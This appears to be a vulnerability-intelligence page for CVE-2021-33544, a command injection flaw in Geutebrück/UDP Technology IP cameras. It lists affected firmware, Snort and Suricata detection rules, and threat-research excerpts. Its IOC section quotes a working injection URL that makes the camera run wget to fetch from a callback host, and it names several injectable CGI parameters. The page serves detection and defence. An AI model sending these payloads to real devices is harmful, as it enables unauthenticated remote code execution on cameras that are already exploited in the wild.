CVE-2021-33544
published 2021-09-13CVE-2021-33544: Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute…
PriorityP181high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
94.62%
99.8th percentile
Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.
Affected
66 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| geutebr_ck | e2_series | — | — |
| geutebr_ck | e2_series | — | — |
| geutebr_ck | e2_series | — | — |
| geutebr_ck | e2_series | — | — |
| geutebr_ck | e2_series | — | — |
| geutebr_ck | e2_series | — | — |
| geutebr_ck | e2_series | — | — |
| geutebr_ck | e2_series | — | — |
| geutebr_ck | e2_series | EBC-21xx – 1.12.0.27 | — |
| geutebr_ck | e2_series | EFD-22xx – 1.12.0.27 | — |
| geutebr_ck | e2_series | ETHC-22xx – 1.12.0.27 | — |
| geutebr_ck | e2_series | EWPC-22xx – 1.12.0.27 | — |
| geutebr_ck | encoder_g-code | — | — |
| geutebr_ck | encoder_g-code | — | — |
| geutebr_ck | encoder_g-code | — | — |
| geutebr_ck | encoder_g-code | — | — |
| geutebr_ck | encoder_g-code | EEC-2xx – 1.12.0.27 | — |
| geutebr_ck | encoder_g-code | EEN-20xx – 1.12.0.27 | — |
| geutebrueck | g-cam_ebc-2110_firmware | <= 1.12.0.27 | — |
| geutebrueck | g-cam_ebc-2110_firmware | — | — |
| geutebrueck | g-cam_ebc-2110_firmware | — | — |
| geutebrueck | g-cam_ebc-2111_firmware | <= 1.12.0.27 | — |
| geutebrueck | g-cam_ebc-2111_firmware | — | — |
| geutebrueck | g-cam_ebc-2111_firmware | — | — |
| geutebrueck | g-cam_ebc-2112_firmware | <= 1.12.0.27 | — |
Detection & IOCsextracted from sources · hover to see the quote
url//uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything
path/uapi-cgi/certmngr.cgi
path/testcmd.cgi
path/simple_reclistjs.cgi
path/factory.cgi
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - certmngr.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/certmngr.cgi?action=createselfcert&"; fast_pattern; content:"&state=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033295; rev:2;)
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - testcmd.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/testcmd.cgi?"; fast_pattern; content:"command=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033305; rev:1;)
snort
alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - testcmd.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/testcmd.cgi?"; fast_pattern; content:"command=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033304; rev:1;)
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - simple_reclistjs.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/simple_reclistjs.cgi?"; fast_pattern; content:"date=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033303; rev:1;)
snort
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - factory.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/factory.cgi?"; fast_pattern; content:"preserve=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033297; rev:1;)
- →Exploit targets the `state` parameter of certmngr.cgi with a shell command substitution payload (e.g., `$(...)`). Look for `&state=$` (URL-encoded as `&state=%24`) in HTTP GET requests to /certmngr.cgi.
- →Exploit targets the `command` parameter of testcmd.cgi with a shell command substitution payload. Look for `command=$` (URL-encoded as `command=%24`) in HTTP GET requests to /testcmd.cgi, both inbound and outbound.
- →Exploit targets the `date` parameter of simple_reclistjs.cgi with a shell command substitution payload. Look for `date=$` in HTTP GET requests to /simple_reclistjs.cgi.
- →Exploit targets the `preserve` parameter of factory.cgi with a shell command substitution payload. Look for `preserve=$` in HTTP GET requests to /factory.cgi.
- →The Nuclei PoC uses an out-of-band (OAST/interactsh) HTTP callback via a `wget` command injected into the `state` parameter to confirm exploitation. Monitor for unexpected outbound HTTP connections from camera devices.
- →All exploit attempts use HTTP GET method against the vulnerable CGI endpoints. Unauthenticated access is possible — no authentication headers are required in the PoC request. ↗
- ·The Nuclei template uses `interactsh-url` as a placeholder for an out-of-band interaction server. The detection matcher only confirms exploitation via an HTTP callback (`interactsh_protocol: http`), meaning blind/non-OAST environments will not trigger the matcher.
- ·The ET Snort rules use `|24|` as the hex representation of the `$` character to detect shell command injection. Attackers using alternative injection syntaxes (e.g., backticks) may evade these signatures.
CVSS provenance
nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6866-wg5c-v3mm: Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely
ghsa_unreviewed·2022-05-24
CVE-2021-33544 [HIGH] CWE-77 GHSA-6866-wg5c-v3mm: Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely
Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.
VulnCheck
geutebruck g-cam_ebc-2110 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2021·CVSS 7.2
CVE-2021-33544 [HIGH] geutebruck g-cam_ebc-2110 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
geutebruck g-cam_ebc-2110 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.
Affected: geutebruck g-cam_ebc-2110
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://twitter.com/ESETresearch/status/1440052837820428298?s=20; https://www.radware.com/getmedia/d312a5fa-2d8d-4c1e-b31e-73046f24bf35/Alert-Dark-OMIGOD.aspx; https://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits; https://dashboard.shadowse
CISA ICS
Geutebrück G-Cam E2 and G-Code
cisa_ics·2021-07-27·CVSS 9.8
[CRITICAL] Geutebrück G-Cam E2 and G-Code
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
Geutebrück G-Cam E2 and G-Code
Last RevisedJuly 27, 2021
Alert CodeICSA-21-208-03
## 1. EXECUTIVE SUMMARY
- CVSS v3 9.8
- ATTENTION: Exploitable remotely/low attack complexity/public exploits are available
- Vendor: Geutebrück
- Equipment: G-Cam E2 and G-Code
- Vulnerabilities: Missing Authentication for Critical Function, Command Injection, Stack-based Buffer Overflow
## 2. RISK EVALUATION
UDP Technology supplies multiple OEMs such as Geutebrück with firmware for IP cameras. Successful exploitation of these vulnerabilities could allow unauthenticated access to sensitive i
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - testcmd.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
suricata·2021-07-09·CVSS 7.2
CVE-2021-33544 [HIGH] ET EXPLOIT UDP Technology Firmware (IP Cam) - testcmd.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
ET EXPLOIT UDP Technology Firmware (IP Cam) - testcmd.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - testcmd.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/testcmd.cgi?"; fast_pattern; content:"command=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033304; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0008, mitre_tactic_name L
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - simple_reclistjs.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
suricata·2021-07-09·CVSS 7.2
CVE-2021-33544 [HIGH] ET EXPLOIT UDP Technology Firmware (IP Cam) - simple_reclistjs.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
ET EXPLOIT UDP Technology Firmware (IP Cam) - simple_reclistjs.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - simple_reclistjs.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/simple_reclistjs.cgi?"; fast_pattern; content:"date=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033303; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA000
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - certmngr.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
suricata·2021-07-09·CVSS 7.2
CVE-2021-33544 [HIGH] ET EXPLOIT UDP Technology Firmware (IP Cam) - certmngr.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
ET EXPLOIT UDP Technology Firmware (IP Cam) - certmngr.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - certmngr.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/certmngr.cgi?action=createselfcert&"; fast_pattern; content:"&state=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033295; rev:2; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA000
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - testcmd.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
suricata·2021-07-09·CVSS 7.2
CVE-2021-33544 [HIGH] ET EXPLOIT UDP Technology Firmware (IP Cam) - testcmd.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
ET EXPLOIT UDP Technology Firmware (IP Cam) - testcmd.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - testcmd.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/testcmd.cgi?"; fast_pattern; content:"command=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033305; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0008, mitre_tactic_name Lat
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - factory.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
suricata·2021-07-09·CVSS 7.2
CVE-2021-33544 [HIGH] ET EXPLOIT UDP Technology Firmware (IP Cam) - factory.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
ET EXPLOIT UDP Technology Firmware (IP Cam) - factory.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - factory.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/factory.cgi?"; fast_pattern; content:"preserve=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033297; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0008, mitre_tactic_name La
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - tmpapp.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
suricata·2021-07-09·CVSS 7.2
CVE-2021-33544 [HIGH] ET EXPLOIT UDP Technology Firmware (IP Cam) - tmpapp.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
ET EXPLOIT UDP Technology Firmware (IP Cam) - tmpapp.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - tmpapp.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/tmpapp.cgi?"; fast_pattern; content:"appfile.filename=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033306; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0008, mitre_tactic_
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - oem.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
suricata·2021-07-09·CVSS 7.2
CVE-2021-33544 [HIGH] ET EXPLOIT UDP Technology Firmware (IP Cam) - oem.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
ET EXPLOIT UDP Technology Firmware (IP Cam) - oem.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - oem.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/oem.cgi?"; fast_pattern; content:"environment.lang=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033300; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0008, mitre_tactic_name Late
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - simple_reclistjs.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
suricata·2021-07-09·CVSS 7.2
CVE-2021-33544 [HIGH] ET EXPLOIT UDP Technology Firmware (IP Cam) - simple_reclistjs.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
ET EXPLOIT UDP Technology Firmware (IP Cam) - simple_reclistjs.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - simple_reclistjs.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/simple_reclistjs.cgi?"; fast_pattern; content:"date=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033302; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - certmngr.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
suricata·2021-07-09·CVSS 7.2
CVE-2021-33544 [HIGH] ET EXPLOIT UDP Technology Firmware (IP Cam) - certmngr.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
ET EXPLOIT UDP Technology Firmware (IP Cam) - certmngr.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - certmngr.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/certmngr.cgi?action=createselfcert&"; fast_pattern; content:"&state=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033294; rev:2; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - factory.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
suricata·2021-07-09·CVSS 7.2
CVE-2021-33544 [HIGH] ET EXPLOIT UDP Technology Firmware (IP Cam) - factory.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
ET EXPLOIT UDP Technology Firmware (IP Cam) - factory.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - factory.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/factory.cgi?"; fast_pattern; content:"preserve=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033296; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0008, mitre_tactic_name
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - language.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
suricata·2021-07-09·CVSS 7.2
CVE-2021-33544 [HIGH] ET EXPLOIT UDP Technology Firmware (IP Cam) - language.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
ET EXPLOIT UDP Technology Firmware (IP Cam) - language.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)
Rule: alert http [$HOME_NET,$HTTP_SERVERS] any -> any any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - language.cgi RCE via Command Injection Attempt Outbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/language.cgi?"; fast_pattern; content:"date=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033298; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0008, mitre_tactic_name L
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - language.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
suricata·2021-07-09·CVSS 7.2
CVE-2021-33544 [HIGH] ET EXPLOIT UDP Technology Firmware (IP Cam) - language.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
ET EXPLOIT UDP Technology Firmware (IP Cam) - language.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - language.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/language.cgi?"; fast_pattern; content:"date=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033299; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0008, mitre_tactic_name Lat
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - oem.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
suricata·2021-07-09·CVSS 7.2
CVE-2021-33544 [HIGH] ET EXPLOIT UDP Technology Firmware (IP Cam) - oem.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
ET EXPLOIT UDP Technology Firmware (IP Cam) - oem.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - oem.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/oem.cgi?"; fast_pattern; content:"environment.lang=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033301; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0008, mitre_tactic_name Latera
Suricata
ET EXPLOIT UDP Technology Firmware (IP Cam) - tmpapp.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
suricata·2021-07-09·CVSS 7.2
CVE-2021-33544 [HIGH] ET EXPLOIT UDP Technology Firmware (IP Cam) - tmpapp.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
ET EXPLOIT UDP Technology Firmware (IP Cam) - tmpapp.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT UDP Technology Firmware (IP Cam) - tmpapp.cgi RCE via Command Injection Attempt Inbound (CVE-2021-33544)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/tmpapp.cgi?"; fast_pattern; content:"appfile.filename=|24|"; distance:0; reference:url,www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/; reference:cve,2021-33544; classtype:attempted-admin; sid:2033307; rev:1; metadata:created_at 2021_07_09, cve CVE_2021_33544, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_07_09, mitre_tactic_id TA0008, mitre_tactic_na
Nuclei
Geutebruck - Remote Command Injection
nuclei·CVSS 7.2
CVE-2021-33544 [HIGH] Geutebruck - Remote Command Injection
Geutebruck - Remote Command Injection
Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
Template:
id: CVE-2021-33544
info:
name: Geutebruck - Remote Command Injection
author: gy741
severity: high
description: Geutebruck is susceptible to multiple vulnerabilities its web-based management interface that could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.
impact: |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the affected device, leading to unauthorized access, data theft, or further compromise of the network.
remediation:
Metasploit
Geutebruck Multiple Remote Command Execution
metasploit
Geutebruck Multiple Remote Command Execution
Geutebruck Multiple Remote Command Execution
This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user.
Bleepingcomputer
Mirai DDoS malware variant expands targets with 13 router exploits
blogs_bleepingcomputer·2023-10-10·CVSS 9.8
[CRITICAL] Mirai DDoS malware variant expands targets with 13 router exploits
## Mirai DDoS malware variant expands targets with 13 router exploits
## Bill Toulas
A Mirai-based DDoS (distributed denial of service) malware botnet tracked as IZ1H9 has added thirteen new payloads to target Linux-based routers and routers from D-Link, Zyxel, TP-Link, TOTOLINK, and others.
Fortinet researchers report observing a peak in the exploitation rates around the first week of September, reaching tens of thousands of exploitation attempts against vulnerable devices.
IZ1H9 compromises devices to enlist them to its DDoS swarm and then launches DDoS attacks on specified targets, presumably on the order of clients renting its firepower.
## Extensive IoT targeting
The more devices and vulnerabilities targeted by a DDoS malware increased the potential to build a large and powerful
Fortinet
IZ1H9 Campaign Enhances Its Arsenal with Scores of Exploits | FortiGuard Labs
blogs_fortinet·2023-10-09·CVSS 9.8
[CRITICAL] IZ1H9 Campaign Enhances Its Arsenal with Scores of Exploits | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
IZ1H9 Campaign Enhances Its Arsenal with Scores of Exploits
By Cara Lin | October 09, 2023
Affected Platforms: Linux
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
In September 2023, our FortiGuard Labs team observed that the IZ1H9 Mirai-based DDoS campaign has aggressively updated its arsenal of exploits. Thirteen payloads were included in this variant, including D-Link devices, Netis wireless router, Sunhillo SureLine, Geutebruck IP camera, Yealink Device Management, Zyxel devices, TP-Link Archer, Korenix Jetwave, and TOTOLINK routers.
Based on the trigger counts recorded by our IPS signatures, it is evident that peak exploitation occurred on September 6, with trigger counts ran
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42·2021-10-14
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh. This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC is working, but the service could also be used by attackers who want to be sure an exploit is working.
This blog will first introduce the Interactsh tool and how researchers or attackers can leverage it to perform vulnerability validation. We then describe some of the many exploits in the wild leveraging this tool, and we
Unit42
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
blogs_unit42·2021-10-14
Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
Threat Research Center
Threat Research
Cybercrime
## Attackers Are Taking Advantage of the Open-Source Service Interactsh for Malicious Purposes
Yue Guan
Jin Chen
Leo Olson
Wayne Xin
Daiping Liu
Published: October 14, 2021
Cybercrime
Threat Research
Attack analysis
Exploit
Exploit in the wild
Interactsh
## Executive Summary
Recently, Unit 42 has observed active exploits related to an open-source service called Interactsh . This tool can generate specific domain names to help its users test whether an exploit is successful. It can be used by researchers – but also by attackers – to validate vulnerabilities via real-time monitoring on the trace path for the domain. Researchers creating a proof of concept (PoC) for an exploit can insert Interactsh to check whether the PoC
Greynoiseio
Malicious Tag Roundup (Jul 19-Aug 2, 2021)
blogs_greynoiseio·CVSS 10.0
[CRITICAL] Malicious Tag Roundup (Jul 19-Aug 2, 2021)
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
2021-09-13
Published
Exploited in the wild